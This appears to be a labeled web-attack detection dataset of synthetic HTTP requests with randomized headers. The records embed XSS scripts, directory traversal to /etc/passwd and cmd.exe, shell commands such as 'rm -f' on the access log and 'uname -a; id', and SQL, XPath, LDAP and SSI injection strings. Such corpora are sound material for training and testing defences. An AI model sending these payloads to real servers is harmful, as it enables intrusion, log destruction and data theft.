UA-CPU: StrongARM
UA-Disp: 979,7479,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9192x115
Via: 6.4 144.180.153.142, 1.5 www.dy7xi.htm
Transfer-Encoding: identity
Upgrade: opGee/0.6, iij/9.1, thIez/8.7
Warning: 497 53.69.32.200 "2sutvHa56sEcoGpl" "Mon, 17 Oct 05 23:56:09 GMT"
X-Forwarded-For: 61.92.55.45
X-Serial-Number: 4750592519886658439
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49572
Start - Id: 47502
class: XSS
GET /tn3/8form1cGJ/oitCei.jpg?sl=%3Cinput+++++type++%3D+%22++image++++%22++++dynsrc++%3D%22javascript%3A+%5Balert%28%27na%27%29%3B%5D%22+%3E&inoac0mscdonqgs=ov8H&lr2hdyllt=bcn+kr&kMLZf@IvO=ffK&nstaEnbevtw=0aepon%27link%26he%40+%3C&idIc=045 HTTP/1.1
Host: www.yheetat.net
Connection: close
Accept: application/*, application/*;q=0.7, audio/*
Accept-Charset: utf-7
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.9
Cache-Control: max-stale
Client-ip: 121.61.23.210
Cookie: wbasrnTjea=nqo;oRoostsuasrfo=rcpawhere;jel3yamy8t3n=t deletehe2e'tilrjkwhere;teC0ea3EnS=eetodeood0tixaon;nrnwfltt6st=968;hOti8e2sneida=0
Cookie2: $Version="037"
Date: Fri, 05 Nov 04 03:38:02 GMT
ETag: W/"mH_4FRfD3DPEqxMbE"
Expect: 100-continue
From: hD4h@iejie.gov
If-Modified-Since: Sun, 30 Jul 06 15:14:33 UTC
If-Unmodified-Since: Wed, 24 Mar 10 10:41:48 GMT
If-Match: *
If-None-Match: "psPV2ruvNNT45x2-w"
If-Range: *
Max-Forwards: 8500
MIME-Version: 2.5
Pragma: nheqsgo='lToex'
Proxy-Authorization: Basic aXJvZXA6Y3NlYWFyYg==
Authorization: bcruo azhbia=tFsx
Range: 9183-933,-0
Referer: /svobn.cfm
TE: trailers,trailers,trailers
Trailer: Authorization
User-Agent: 8qiBFY5 http://www.hiwclP2S.de
UA-CPU: x86
UA-Disp: 076,499,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 7841x155
Via: fnAhun/6.5 www.eh33mol.gif, HTTP/2.4 www.hI34iv.png, 0.2 171.144.220.41
Transfer-Encoding: compress
Upgrade: wlH4l/4.4
Warning: 460 71.20.89.165:7 "nhiets5etmlmtan" "Wed, 05 Dec 07 05:59:26 UTC"
X-Forwarded-For: 121.171.235.172
X-Serial-Number: 48112496441051
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 47502
Start - Id: 45814
class: PathTransversal
GET /2u/etw0Nwt/as/wRr68ceiuu0lmsein/DBA.css?spnfegyeheiai=nhzedurssen8&8mnph-adminuPoB=eerhtstiiopenn%28%2Fsp&yoooEqvdh=7eiiep9errheir&ASht=831744&9DA52a=h&_SoformRlEze15=9550835&jwUr6=1%40HiY6VFimA&OnthotkeO6C=8908&att4leo=4056&x-script1lVsN94q=e7eJE&hq5rgbow=..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&trj7Rpir=cMThM&t2aiTdt1j=esieh&foqioued=dropra&qYMJr=esTgq2iq0U-J HTTP/1.0
Host: 174.10.171.59
Connection: O2h1wM
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: sqgsfe-ew8avhu, aea-snis;q=0.3, wTepaoyh-sedAb;q=0.3, rrtordsg-tsym6Sc;q=0.8
Cache-Control: max-age=066
Client-ip: 241.101.131.168
Cookie: 9et=871;ulmie0nr=t5hY
Cookie2: $Version="27"
Date: Wed, 09 Jun 04 20:31:04 UTC
ETag: "a.tNg79xfo.c9O6l"
Expect: qbe2T2hT=o0sogd
From: rpAl@yhsq9eT1.st
If-Modified-Since: Tue, 06 Sep 05 06:21:30 CET
If-Unmodified-Since: Wed, 31 Dec 08 22:54:44 GMT
If-Match: *
If-None-Match: "la8MYH_M63Ew4HEX"
If-Range: Fri, 16 Sep 05 07:40:19 CET
Max-Forwards: 086
MIME-Version: 4.8
Pragma: tiyrnu='ee8cq'
Proxy-Authorization: NTLM UGFBdGk4c3ZhNWk0b290ZXRodGVvb2N0UzFtT2lveXJvc2Ru
Authorization: Enne e6ota=ceehpe
Range: 2-5,-391
Referer: http://www.tOcr.uk/9ngisga/eihhch8O/50eae.doc
TE: trailers,deflate;q=0.4
Trailer: Host
User-Agent: Mozilla/9.8 (X11; U; Unix 4.9; 0b-ve; rv:4.0.7) Gecko/81417623
UA-CPU: PowerPC
UA-Disp: 742,2997,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 0280x466
Via: HTTP/0.7 135.85.253.30
Transfer-Encoding: aglu
Upgrade: T7eg/6.6
Warning: 348 176.99.74.150 "C9nbizlettg" 
X-Forwarded-For: 20.38.1.164
X-Serial-Number: 97437776345
----: ---------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 45814
Start - Id: 43663
class: OsCommanding
GET %u002e%u002e%u002f%u002e%u002e%u002fwinnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.lDti.biz
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: t5esooln-l;q=0.1, rri-tb;q=0.6, mbpeoBva-r;q=0.5, himsdb3i-7u;q=0.9
Cache-Control: min-fresh=326
Cookie: taaeartiel=tngovulcuqaDAqa;sgso4t=kpt r[deirjyd4rform;behzt1=tintb2
Date: Mon, 26 May 08 15:14:01 CET
ETag: W/"vIAsssT5MPBJtm8Z8RlU"
If-Modified-Since: Fri, 16 Dec 05 18:16:43 CET
If-Unmodified-Since: Sun, 09 Dec 07 13:12:33 GMT
If-Match: "4RwpNY5ja7vm3k-"
If-None-Match: "aQv.P6W6o6GbeiSxKqn"
If-Range: *
Max-Forwards: 6
Pragma: no-cache
Referer: http://www.cerc.cz/ov5lnloi/iartwua/euFtimo/Tee1ue.css
TE: chunked,gzip;q=0.9
User-Agent: Mozilla/4.4 (X11; U; Linux i586 1.2; el-oc; rv:9.0.4) Gecko/35308660
Via: FTP/1.2 www.ehKh1oy.js:9, 2.2 www.iSaFszw.shtml, HTTP/3.9 www.gmihoAai.gif:764
Transfer-Encoding: identity
Warning: 751 56.29.223.90 "eeBwlaace" 
X-Forwarded-For: 201.4.5.90
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43663
Start - Id: 36379
class: PathTransversal
PUT /eE/gztqEerooaR1thgnlnai/geeot/pnd/fZNYevalPA8yJ24TB/unml7XehfwI/rsgtumyoTh.cfm? HTTP/1.0
Content-Length: 44
Content-Language: ncp,tlE2e
Content-Encoding: deflate
Content-MD5: ZXNhZGxycTBlbnJjaG5jaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 11 Dec 07 18:59:03 CET
Last-Modified: Tue, 11 Oct 05 16:11:20 GMT
Host: www.w8rdnv.de
Connection: close
Accept-Charset: iso-8859-5;q=0.4, x-mac-cyrillic, iso-2022-kr, iso-2022-kr;q=0.0, euc-jp;q=0.7
Accept-Encoding: 
Accept-Language: w3t4-hot, saob-TlaE, reh4eoa-ayei;q=0.7, dnfz-lseri;q=0.5
Cache-Control: max-age=73513
Cookie: TvtC9s=\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html;a5o1Oay6pwmdmve=68529708
Cookie2: $Version="857"
Date: Thu, 22 Nov 07 02:44:49 CET
Expect: 100-continue
If-Modified-Since: Tue, 29 Aug 06 04:26:31 UTC
If-Match: *
If-None-Match: "1LdVKRnRs9M7sxWeCBPM"
Max-Forwards: 4957
Referer: http://www.ze6o9tsb.uk/lhAei/jf7tdtm/btse.ace
Trailer: If-Range
User-Agent: zhad7n/6.5
X-Forwarded-For: 36.185.178.17

JtOz9tXX7os=oc&CSNMLiVzCCq=]aHeEsSe)Etsr

End - Id: 36379
Start - Id: 48990
class: XPathInjection
GET /byn0kn.cfm?nosHwonesd=egattsdiknxaor&en=sto%7E&fwtlhGtmvb6tgv=sc845ghu&tepeerWteOet1=Er&ee=njox&lto8tpt=o7Vn319lmeNh&debwserlftmbezy=re%40%3Ex+&a2eeahehw=rfIodistne&enauPmt=bhptgfhmhiahghe0u&RcEbzidao=ostiel%27+or+++++is9%2Fc%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D871%5D+or+++%27eteHnrtd%27++++%3D++++%27&window.open7Qt=torlsfr&ainieeb=iydanqtabryueidest&hpsbsercrseosh=ien5saaipr8wn&yAgenpGunrtetE=u%28%3Ae%3FGte%3CeT&HuetlNyieadirke=l+bn HTTP/1.1
Host: 242.58.98.251:90
Connection: Ignar5
Accept: image/jpeg, video/*, image/gif;q=0.1
Accept-Charset: ks_c_5601-1987, ks_c_5601-1987, iso-8859-6;q=0.9, utf-7;q=0.7, x-mac-turkish
Accept-Encoding: *
Accept-Language: Lra-4lmditc
Cache-Control: max-stale
Client-ip: 102.111.118.138
Cookie: elebeH65c=thft02ddlamseoyhlh;8sOmao9eouker=14485
Cookie2: $Version="778"
Date: Sun, 06 Nov 05 08:19:21 UTC
ETag: "L18TtWv_HO4fi5oihf"
Expect: 100-continue
From: rdd7Hew6@nxilnib.gov
If-Modified-Since: Sun, 29 Aug 04 08:59:11 CET
If-Unmodified-Since: Fri, 14 Mar 08 22:01:14 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6230
MIME-Version: 7.4
Pragma: h='egn8to'
Proxy-Authorization: 1mml leiEsi=hessd
Authorization: Digest opaque="tfbSexsr"
Range: 23-,057-,45-
Referer: http://Aaiera.com/ctnyeym.gif
TE: trailers,gzip,gzip
Trailer: From
User-Agent: pfbbn/9.6.5.9
UA-CPU: 68000
UA-Disp: 8493,346,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 6996x6974
Via: FTP/7.1 116.199.85.69:868
Transfer-Encoding: compress
Upgrade: eEote/7.1, iaaqjs/8.0
Warning: 728 157.50.122.194 "mlteR2oivlsnuennt" "Wed, 05 Jan 05 24:55:15 GMT"
X-Forwarded-For: 235.34.139.147
X-Serial-Number: 544350626543951868
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48990
Start - Id: 42408
class: SqlInjection
GET /lB@BMFnK/iot7igfElpngh/vc5QBqYlbody44lBpV/otJTrq2z3oPDcvOlC/i6and0eseu.html?zosdtojpaE8o5o=950+or++++id%3E5++++or+++ls_id%3C92&Ff4AWp9UKtH-=n0oa HTTP/1.1
Host: 66.206.152.164:80
Connection: ydzs
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: identity
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 161.232.72.123
Cookie: erong47mhdareol=rhttMvtg5rPdwvltbd;e1AorkPuisa=895581;sonrnlodHse=iklmail7ifromt;-Ny5GdZsm=ioi7Ost;88=sTvoer
Cookie2: $Version="0"
Date: Sat, 19 Mar 05 04:32:01 CET
ETag: "zdJDw1NqDWtqv5b-Kw@G"
Expect: n9b6et=eeaexsg
From: 1tXiees@Csgv.st
If-Modified-Since: Sun, 18 Mar 07 10:37:17 GMT
If-Unmodified-Since: Wed, 27 Oct 04 19:47:38 GMT
If-Match: "vkpoMkjmqoItnV73PGk"
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Basic YWV0ZWJwdzplbHdOZm1lcg==
Authorization: Basic ZXNkdTphYjBlYWs=
Range: -4,92807-997,-01613
Referer: /aewl7oe/eiaMmoag.wav
TE: chunked;q=0.7
Trailer: Host
User-Agent: Mozilla/1.1 (Windows; U; Win 9x 3.5; fo-Et; rv:3.9.7) Gecko/08309665
UA-CPU: StrongARM
UA-Disp: 156,101,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 189x646
Via: 3.9 www.oege.gif, 8.2 www.llttnaal.gif:90253
Transfer-Encoding: gzip
Upgrade: 2ac/9.1, rwme/4.7
Warning: 593 www.ibdmueus.shtml "Egye9eoeioV6AwrcnL" 
X-Forwarded-For: 120.46.59.231
X-Serial-Number: 67876
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42408
Start - Id: 49823
class: XPathInjection
GET /iqyFN-owBy9DA1F/iQia/tvc/gAoLcd31nasZsdtc/r7jywk4vMCsMHTX/d5tQcQIC/iyMH2TrZrMmY/tqfjRgdocument.bin?otserebeaa=%28i++++%3C+++++count%28s5%2Fchild%3A%3Atext%28%29%29++and++j++++%3C+++count%28ez%2Fchild%3A%3Acomment%28%29%29++++and+++++k+++++%3C+++++count%28seaNEo%2Fchild%3A%3A*%29+%29&ocea=Dxhef4&soatxhmdins=5%3Are HTTP/1.0
Host: www.lgpsaltwd.cz
Connection: eE0iirs7
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 113.253.116.24
Cookie: tieneslhdpf=ee9E6AUbeac;oasn=wesein;1eLetiea=3li
Cookie2: $Version="3"
Date: Tue, 15 Jul 08 20:37:23 UTC
ETag: "zy_qieYB8jV9UgdeU3V"
Expect: 100-continue
From: noamdhg@Dea3h8.biz
If-Modified-Since: Tue, 01 Feb 05 04:39:17 UTC
If-Unmodified-Since: Sat, 18 Dec 04 11:43:13 GMT
If-Match: "ucecuX_RhmYNzx9e07F"
If-None-Match: "oVNA9rVlIhP3cgwZ"
If-Range: *
Max-Forwards: 623
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Basic ZVJhcnJsQTppc3Blbw==
Authorization: Digest nc=35E3aFbA
Range: 146069-77725,-1146
Referer: http://nbftTsW.cz/juPsd1s/ec8cet/tHarrfo/tedata/dehkOa.js
TE: trailers
Trailer: Via
User-Agent: Mozilla/2.9 (compatible; ttucjaeVe; Win 9x; msanfeexp)
UA-CPU: MIPS
UA-Disp: 662,518,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 172x6984
Via: HTTP/7.0 www.hoeodieh.js
Transfer-Encoding: compress
Upgrade: csHhet/2.8, rcvs/9.5, tstne/7.0, sthmz/6.3
Warning: 205 www.ttrce.htm "Tia5umnten" 
X-Forwarded-For: 102.140.21.48
X-Serial-Number: 684744620
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49823
Start - Id: 43106
class: OsCommanding
GET /tnOruloslA/1V.ABTaccess_log/fb7Bautoexeca_vIvD/aerInrrr/gAvihMysei3no7tew.dll?bototndttnrulke=%250arm++-f+++%2Fvar%2Flog%2Fhttpd%2Faccess_log+++%3B&knjFRyf=HTona+6%3E%25a+exec%25&qucMte=3YZ0Cn.5fJnk&aneo0itgh1nsroe=tnlocation3i HTTP/1.1
Host: 38.84.60.227
Connection: asold
Accept: */*;q=0.6
Accept-Charset: hz-gb-2312;q=0.6, iso-8859-7;q=0.8, x-mac-turkish;q=0.8
Accept-Encoding: compress;q=0.6
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 98.175.194.206
Cookie: oey3efl9rrsN=201
Cookie2: $Version="389"
Date: Wed, 13 May 09 02:40:40 CET
ETag: W/"serhTk.H6CLaJXWV4zF"
Expect: 100-continue
From: roneeua@1gSEvrlu.org
If-Modified-Since: Sat, 21 Mar 09 04:23:17 UTC
If-Unmodified-Since: Sun, 06 May 07 02:02:34 GMT
If-Match: "jdwbFvJPnMH_IV6oInuG"
If-None-Match: "eMLl4dlwTxHxQvYT"
If-Range: "HL4rjtEB9D0isHuw"
Max-Forwards: 866
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: Jwosfs mnR2=s6nera
Authorization: Digest uri=/T1ebtt.php
Referer: http://www.etH9.cz/Eoamdbee/sa7Ol/rtkc/rl5Sya7c.txt
TE: trailers,chunked;q=0.0
Trailer: Date
User-Agent: slj_Maq http://www.ndo7ur0a.cz
UA-CPU: 68000
UA-Disp: 046,4473,8
UA-OS: Solaris
UA-Pixels: 2923x7442
Via: EEsH2l/5.3 www.iwdy45a.tiff, 2.1 184.193.245.121
Transfer-Encoding: gzip
Upgrade: gowla/8.8, 8aooI/3.3, Tkiyol/1.8
Warning: 117 www.nI2s.jpeg "duaiiS2" 
X-Forwarded-For: 204.73.145.24
X-Serial-Number: 306986025864028
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43106
Start - Id: 48521
class: XPathInjection
PUT /eohycmzpwamohtlyee/3R_.B2Ce/ysgedbr5k3esttpetc/Q8s.html? HTTP/1.0
Content-Length: 283
Content-Language: ttse,eiboe
Content-Encoding: deflate
Content-Location: /6foist5/2beir/telvui.nsf
Content-MD5: bWFzcnRIbXRhZzhlZmVvNQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 03 May 10 21:08:21 UTC
Last-Modified: Mon, 02 Jul 07 19:11:33 UTC
Host: www.utcpp6r6.ch
Connection: keep-alive
Accept: image/png;q=0.5
Accept-Charset: windows-1251, x-mac-arabic;q=0.9, iso-8859-6
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 221.85.134.126
Cookie: lwer7kot=triperlefoeecy2rmzlrn
Cookie2: $Version="5"
Date: Wed, 27 Jun 07 05:00:15 UTC
ETag: W/"DH_rMCDx8@tWH@v-"
Expect: 100-continue
From: ihJ5ekit@y1isB05.uk
If-Modified-Since: Fri, 22 Jul 05 01:47:06 UTC
If-Unmodified-Since: Thu, 14 Apr 05 11:42:10 UTC
If-Match: *
If-None-Match: "CRF7bM-U7NLhH0jfaJvj"
If-Range: *
Max-Forwards: 92
MIME-Version: 0.8
Pragma: cfAec=y
Proxy-Authorization: Basic ZXNycGVkOmNxbU8=
Authorization: dLedL1 9at7e=pu3pp5
Range: -97671,976035-235370,9-723
Referer: /rwea/klels2t.shtml
TE: deflate;q=0.5
Trailer: Max-Forwards
User-Agent: Mozilla/9.3 (compatible; Konqueror/3.8; Win 9x; aehn; n1n84c7ore; 2cSsoaltE)
UA-CPU: Sparc
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 7707x473
Via: 7.5 240.124.8.2, FTP/9.9 73.20.79.9, 0.9 97.17.163.222
Transfer-Encoding: gzip
Warning: 957 253.110.11.25 "hCgutc3eu9" 
X-Forwarded-For: 104.189.251.216
X-Serial-Number: 7572286452988
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

u2nDwSoc=622309&8N1y=ohwEri&nndma5iH=eenbt'     or    dopcs/uofta/child::node()[processing-instruction()=26] or     'oegr5le'=   '&dlH1Ierses=7I0457-8F1k&hayfsw=cVg6Et6&tplvistuwtres=mdntrikaoAaid&we1aceh=38&yaocreeyd5atce=sKH&miNvtdunbst=bovIkelhud1t

End - Id: 48521
Start - Id: 42941
class: OsCommanding
GET /a8RvxWu.6caX/DZ9.htm?towr=Oalai%40c&aismsb=uFggrdP&ad9hthicot=h&tmpnlibhomeih@4Trzp=t+il&fls1an=t8pM&M6Vlink-=n%5C&iAoof8=utLaccess_logs&SEne3fptghhy=3221 HTTP/1.0
Host: 61.145.34.100:3943
Connection: keep-alive
Accept: audio/*;q=0.2, video/quicktime;q=0.5, image/jpeg
Accept-Charset: iso-8859-8-i, x-mac-hebrew, big5, iso-2022-kr, x-mac-arabic
Accept-Encoding: *
Accept-Language:   ;    echo          ;  w    ;   uname  -a    ;    id
Cache-Control: olN3xsih='e'
Client-ip: 117.172.196.9
Cookie: jEtiritesomE9s=anw7sit;ou3tz6a=1986369;nysCom=oJiHKXKB
Cookie2: $Version="9"
Date: Tue, 11 Sep 07 02:57:42 CET
ETag: W/"pkDDerwI.sGRtxxDF"
Expect: 100-continue
From: 3aheja@ties8On.biz
If-Modified-Since: Tue, 21 Aug 07 07:43:54 CET
If-Unmodified-Since: Wed, 05 May 10 13:54:16 GMT
If-Match: *
If-None-Match: "rf5ECoaXOoU2CsaYS11Y"
If-Range: "cU71j9SvrBCVG8Jx6"
Max-Forwards: 69
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Digest cnonce="ihsrran"
Authorization: atago sztecibe=ef5eo3e
Range: 01418-88080,370072-
Referer: http://h1it.org/oNumohh/owonbMe.aspx
TE: deflate
Trailer: Referer
User-Agent: Mozilla/6.0 (compatible; ntzEvxLr; Open BSD i386; mab2teei7)
UA-CPU: PowerPC
UA-Disp: 810,554,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 512x475
Via: HTTP/1.2 211.82.97.82
Transfer-Encoding: identity
Upgrade: rts/3.1, eacx/4.9, rit/1.5, Wj7c/1.4
Warning: 513 www.cgtoaN.jpg "orin5gbEs" 
----: ------------------------------------------------

null

End - Id: 42941
Start - Id: 40927
class: SSI
GET /DgorDzmZT/Nu4atxmakobcbyntu/b3UHYnHjTq.tiff?gXBozomlmu=%3C%21--+++%23odbc++++statement%3D++++%22select+++iosel%2C+ecqRo%2C++++md++++from++s1sHqx+++order++++by++9%2C+++32%2C+++++6%22++--%3E&Vhome1p0ZPf_=700895&58h4eoanrlya=zucteaotsastea&anaf5nen=886788603&9mpkuhCm=%3CA+h%3Bmb HTTP/1.0
Host: 51.202.26.48
Connection: close
Accept: */*;q=0.5
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: 0Rnts='sTp'
Client-ip: 120.251.255.184
Cookie: mhd5lleesli3ub=98;ern=sacceptuyov
Cookie2: $Version="5"
Date: Sun, 18 May 08 09:32:54 GMT
ETag: W/"8masr5MiUJT4dyo4siJ"
Expect: nBhmshg
From: ioOee@owoeu.be
If-Modified-Since: Wed, 03 Jan 07 20:20:50 GMT
If-Unmodified-Since: Sat, 05 May 07 06:00:20 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 03 Aug 09 05:07:42 GMT
Max-Forwards: 9867
MIME-Version: 4.2
Pragma: thii='w'
Proxy-Authorization: Digest qop=auth-int
Authorization: ideGn tlTOri=vJs4ao
Range: -25
Referer: /eroce/ljRork/inixe6.mp3
TE: chunked;q=0.8
Trailer: Accept
User-Agent: Mozilla/0.3 (Machintosh; U; Mac OS X 0.6; is-n2; rv:2.9.0) Gecko/90352437
UA-CPU: PowerPC
UA-Disp: 613,8082,8
UA-OS: Linux
UA-Color: color16
Via: HTTP/4.8 www.Y1gmuueo.css, FTP/9.7 19.69.213.154
Transfer-Encoding: compress
Upgrade: datbe/5.7
Warning: 086 61.20.174.151 "hej5T2phoa6l2adseC1t" 
X-Forwarded-For: 60.122.216.106
X-Serial-Number: 163741114628927
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 40927
Start - Id: 38491
class: LdapInjection
GET /smFSyi@yfhL/32hiMgroup by1IB/ic86epmyxb/yWAJnfhIBnu1xc4WOJjj/sfB.nsf?4deBr=dBdOt_n0oOY%40&BYdtBl01VMYf=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&LUVz=Hitd&4etcAcDBstoXautoexec.=ldOkeeuj8e&oeeihsfHoeue=322257&E7HIkM=le7&ixZdeletedtmpkbA_=seEenwianrnT&chd7dietaety=ydi HTTP/1.0
Host: www.nuneeaoSua.st:99
Connection: keep-alive
Accept: audio/*;q=0.6, application/postscript, image/gif
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 233.33.102.205
Cookie: eicseai=9;yN-K=oQFQOIa.;9uJTxIIih=ial;otTYenfbegwrh=nvther9o tymh;epXrc=vZe9r;CCUS=p@Jvr_.TkXX
Cookie2: $Version="1"
Date: Fri, 05 Dec 08 21:32:07 GMT
ETag: W/"ey0oseul4ln@JDqZ7P"
Expect: deissg=asa6
From: yowh@sjoa6l6daa.gov
If-Modified-Since: Tue, 13 Apr 10 06:20:18 CET
If-Unmodified-Since: Mon, 24 Jul 06 14:24:06 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 15 Jul 09 05:49:12 GMT
Max-Forwards: 9443
MIME-Version: 9.7
Pragma: n=Oeif
Proxy-Authorization: Digest nonce
Authorization: NTLM cnRlY3VraXJoOG9lNXNvcXJpcnBrU3dSMXRJRXRsZHRhRVRm
Range: 0-2571,265856-874172,-17957
Referer: /uutlEtiU/dneio/eirhNrmm/noiqget/detr.conf
TE: chunked;q=0.7,trailers
Trailer: Authorization
User-Agent: sJQEABnV http://www.RtaainT9.st
UA-CPU: 68000
UA-Disp: 2438,693,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 6621x951
Via: HTTP/8.8 www.ittyoat.js, seseA/9.2 www.nscy8ssy.png:1321, FTP/4.5 163.31.200.197:4154
Transfer-Encoding: identity
Upgrade: atd/6.6, fyohd/5.4, rwOx/2.2, 2patf/9.0, swe/3.6
Warning: 748 218.206.210.84 "59neemNylty8eilereeP" "Tue, 26 Feb 08 18:29:12 UTC"
X-Forwarded-For: 226.59.112.50
X-Serial-Number: 66891
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38491
Start - Id: 43850
class: OsCommanding
GET %u002e%u002e%u002f%u002e%u002e%u002fwinnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 161.69.216.51
Connection: keep-alive
Accept: audio/*;q=0.6, audio/*, video/*;q=0.1
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: mEipee-5aHn;q=0.9, noteh-5ril, g-3otnsqth
Cache-Control: max-age=597
Client-ip: 9.232.251.46
Cookie: CvD_=se;Medtaz=793;sNert=ix.I1JDzj3k;3reiehktcibzeiM=ena
Cookie2: $Version="07"
Date: Tue, 25 Sep 07 02:10:38 GMT
ETag: W/"77rk5N1JK52-rQYG"
Expect: 100-continue
From: nxa0tn0@Cododus.net
If-Modified-Since: Thu, 06 Nov 08 24:34:59 CET
If-Unmodified-Since: Sun, 04 Jul 04 24:36:37 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 10 Oct 06 12:51:08 GMT
Max-Forwards: 6
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Digest cnonce="tRstaerb"
Authorization: Basic b2VUdXNldDpyMzVzOXM=
Range: 064373-124259,214-265,801-679
Referer: http://www.7gAeet.be/ktta/cPkenaI5/r1dn/heeAeed.exe
TE: chunked;q=0.4
Trailer: User-Agent
User-Agent: dYPRRDOa http://www.neenAm.com
UA-CPU: PowerPC
UA-Disp: 5599,048,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 629x1097
Via: 1.6 www.niou.png:6
Transfer-Encoding: compress
Upgrade: hnohEn/1.3, he2eEw/1.1, bncL/6.8, m2jzg/1.9, jtxSa/2.3
Warning: 247 246.53.212.201 "ekzocqatldrtah" "Tue, 01 Sep 09 06:23:34 CET"
X-Forwarded-For: 69.99.5.109
X-Serial-Number: 77798884304573720348
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 43850
Start - Id: 35479
class: XPathInjection
GET /c5d/ieebfecsuavt0Eam3/1Lj/wq-rcPdlapkl/9G8KiRmUYaccess_logB1U/hcye/MaMRIZor@F6/oQI42DpFJJe4/ofhdegtawE5wpOno.htm?jXIV6=we&RnodegvchomeKKf9p8=5h&IpsQk=0772370 HTTP/1.1
Host: www.Ieniiteew.fr:03
Connection: keep-alive
Accept: image/*, application/*
Accept-Charset: *
Accept-Encoding: uldoEh/tonca/haE/child::node()[position()=624]  or  'jta'=    '
Accept-Language: *;q=0.1
Cache-Control: max-age=064
Date: Fri, 05 Sep 08 16:50:47 CET
ETag: "Gl6oIwNlvdG98J9"
Expect: 100-continue
From: ngfFicn@0elde0.it
If-Unmodified-Since: Fri, 08 Oct 04 04:06:21 UTC
If-Match: *
If-Range: "qL@dd7VWY5jDxhh"
Max-Forwards: 5654
Pragma: vrn='fwrl7rs'
Referer: /n9itow3/iwemNr.php4
TE: gzip
User-Agent: toodal/nrojh/2/child::node()[position()=9]  or  'yiy'   =    '
Via: FTP/6.4 143.216.41.144
Transfer-Encoding: gzip
----: -------------------------------------------

null

End - Id: 35479
Start - Id: 48018
class: XSS
GET /rtoi0hrri/hjqaOzioOVeon3no/ubcz6D.LWpds8Se7iY/ntol86/rWzJiieW6@PdN/iY0pDYGmCvef0zi48qF.css?eNconihmrlt=%3Cstyle++type++%3D++++%22+text%2Fjavascript%22+%3E%5Balert++%28%27otSEe%27%29%3B%5D%3C%2Fstyle+++%3E&e5zsuvs=iKIj6gAYPmaG&G60andQ=e%2Fl2kHeaE%3Dh&u8JjuHIjfPX=578&lvdrEI=18119286&ceah=f9tIh&irtNuiu=c7.DZnD&ootdo=E5zeM-re88&yofeiEve2ajLb=83478&SaEo=hud HTTP/1.1
Host: www.i1semr.net:2
Connection: close
Accept: video/*, application/*, audio/basic
Accept-Charset: hz-gb-2312;q=0.1
Accept-Encoding: gzip;q=0.4, deflate, gzip;q=0.0, deflate;q=0.4
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 229.36.28.9
Cookie: LlD=dagybe0uobyllpsrch;utetmyaardeNoi=s
Cookie2: $Version="114"
Date: Mon, 20 Apr 09 23:42:58 UTC
ETag: W/"is_gDFA4eJi72o28Xd_"
Expect: 100-continue
From: uesois@ewrsoxtt.it
If-Modified-Since: Mon, 07 Feb 05 03:17:30 CET
If-Unmodified-Since: Sat, 22 Sep 07 11:24:24 UTC
If-Match: "SJV5JT00eWtcq0Pwh"
If-None-Match: "iqwEhKo9ppbJH0qznJ4F"
